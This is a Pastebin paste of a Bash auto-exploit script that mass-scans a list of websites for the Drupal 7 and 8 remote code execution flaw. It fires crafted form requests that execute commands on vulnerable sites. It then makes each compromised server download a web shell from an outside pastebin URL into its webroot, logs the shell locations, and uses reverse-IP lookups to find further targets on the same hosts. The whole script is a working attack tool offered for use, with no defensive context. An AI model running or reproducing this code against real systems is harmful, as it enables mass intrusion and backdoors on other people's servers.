Advertisement
zerobyte-id

Exploiter CMS Drupal RCE

May 3rd, 2018
844
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. # AutoExploit [BOT]
  3. # Remote Code Execute CMS Drupal 7.x - 8 + Reverse IP
  4. # Date : 22 - Apr - 2018
  5. # Usage : ./rce.sh list.txt
  6. # Coded by ZeroByte.ID
  7. useragent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0";
  8. reverse() {
  9.   target=$1
  10.   getip=$(dig +short $1);
  11.   check=$(curl -s https://api.hackertarget.com/reverseiplookup/?q=${getip});
  12.    if [[ $check =~ 'No records found' ]]; then
  13.       echo "[BAD] $getip";
  14.       return 1
  15.    elif [[ $check =~ 'error check' ]]; then
  16.       echo "[BAD] $getip";
  17.       return 1
  18.    elif [[ $check =~ 'API count exceeded' ]]; then
  19.       echo "[WAITING]"
  20.       echo "ROBOT BUTUH ISTIRAHAT BENTARAN!";
  21.       echo "[JANGAN DI STOP!]";
  22.       echo "GUA LAGI NGOPI KURANG LEBIH 10 Menit";
  23.       sleep 10m;
  24.       exit
  25.    else
  26.       curl -s https://api.hackertarget.com/reverseiplookup/?q=${getip} >> domain.tmp
  27.       sleep 0.5s
  28.       list=$(cat domain.tmp | wc -l);
  29.       cat domain.tmp | sed 's|www.||g' | sed 's|mail.||g' >> domains2.tmp
  30.       sort domains2.tmp | uniq >> domains.tmp
  31.       echo "[OK] $getip and $list site";
  32.       sleep 0.6s
  33.       rm domain.tmp
  34.       rm domains2.tmp
  35.     fi
  36. }
  37. drupal7() {
  38.     target=$1
  39.     echo -ne "---";
  40.     cek7=$(curl -s -m 10 -X POST -A ${useragent} --cookie-jar cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id);
  41.     echo -ne "-------";
  42.     sleep 2s
  43.     if [[ $cek7 =~ 'value="form-' ]]; then
  44.         echo -ne "--------------------------";
  45.         token=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
  46.         echo -ne "----------------------------------";
  47.         echo
  48.         sleep 2s
  49.         result=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${token}" --data "form_build_id=${token}" | head -1)
  50.         if [[ $result =~ 'Linux' ]]; then
  51.           echo "[O] VULN RCE $target : uname -a"
  52.           echo "$result";
  53.           echo "Proses Upload Shell ....."
  54.           sleep 2s
  55.           uploadhome=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=wget+-o+zb.php+"https://pastebin.com/raw/S1c9b4ne"" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
  56.           curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${uploadhome}" --data "form_build_id=${uploadhome}" | head -1 > /dev/null
  57.           sleep 5s
  58.           cekshellhome=$(curl -s -m 10 "${target}/zb.php");
  59.           if [[ $cekshellhome =~ 'ZeroByte.ID' ]]; then
  60.             echo "[HOME] Upload Done"
  61.             echo "$result" >> result.txt
  62.             echo "$target/zb.php" | tee -a result.txt
  63.           else
  64.             echo "[HOME] Can't Upload"
  65.           fi
  66.           sleep 2s
  67.           uploaddir=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=wget+-o+sites/default/files/zb.php+"https://pastebin.com/raw/S1c9b4ne"" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
  68.           curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${uploaddir}" --data "form_build_id=${uploaddir}" | head -1 > /dev/null
  69.           sleep 5s
  70.           cekshell=$(curl -s -m 10 "${target}/sites/default/files/zb.php");
  71.           if [[ $cekshell =~ 'ZeroByte.ID' ]]; then
  72.             echo "[DIR WRITABLE] Upload Done"
  73.             echo "$result" >> result.txt
  74.             echo "$target/sites/default/files/zb.php" | tee -a result.txt
  75.             echo "=====================================" >> result.txt
  76.             reverse $target
  77.           else
  78.             echo "[DIR WRITABLE] Can't Upload"
  79.             echo "$target" >> gagal-upload.txt
  80.           fi
  81.           echo "--------------------------------------------------------------------------"
  82.         else
  83.             echo "[X] NOT VULN $target"
  84.             drupal8 $target
  85.         fi
  86.     else
  87.         echo
  88.         echo "[X] NOT VULN $target";
  89.         drupal8 $target
  90.        
  91.     fi
  92. }
  93. drupal8() {
  94.   target=$1
  95.   echo "[O] CHECKING DRUPAL 8";
  96.   echo -ne "---";
  97.   cek8=$(curl -s -m 10 -k "${target}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" --data "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=wget 'https://pastebin.com/raw/S1c9b4ne' -O zb.php")
  98.   cek8_=$(curl -s -m 10 -k "${target}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" --data "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=wget 'https://pastebin.com/raw/S1c9b4ne' -O sites/default/files/zb.php")
  99.   echo -ne "-------------------";
  100.   if [[ $cek8 =~ 'ZeroByte.ID' ]]; then
  101.     echo -ne "-------------------------------------------";
  102.     echo "[O] Upload Done"
  103.     echo "$target/zb.php" | tee -a result.txt
  104.     reverse $target
  105.   else
  106.     if [[ $cek8_ =~ 'ZeroByte.ID' ]]; then
  107.       echo -ne "-------------------------------------------";
  108.       echo "[O] Upload Done"
  109.       echo "$target/sites/default/files/zb.php" | tee -a result.txt
  110.     fi
  111.     echo
  112.     echo "[X] NOT VULN $target !"
  113.     echo -ne "-------------------------------------------------";
  114.     echo "$target" >> not-vuln.txt
  115.     echo
  116.   fi
  117. }
  118.  
  119. cat << "banner"
  120. --------------------------------------------------
  121.                    _           _         _     _
  122.  _______ _ __ ___ | |__  _   _| |_ ___  (_) __| |
  123. |_  / _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |
  124.  / /  __/ | | (_) | |_) | |_| | ||  __/_| | (_| |
  125. /___\___|_|  \___/|_.__/ \__, |\__\___(_)_|\__,_|
  126.                          |___/                  
  127.                                             kUr4x        
  128. ----------------[ RCE Drupal ]--------------------
  129.  
  130. banner
  131.  
  132. for s in $(cat $1); do
  133.     echo "CHECKING DRUPAL 7 $s"
  134.     echo -ne "----";
  135.     drupal7 $s
  136. done
  137. rm cookie.tmp
Advertisement
Advertisement
Advertisement
RAW Paste Data Copied
Advertisement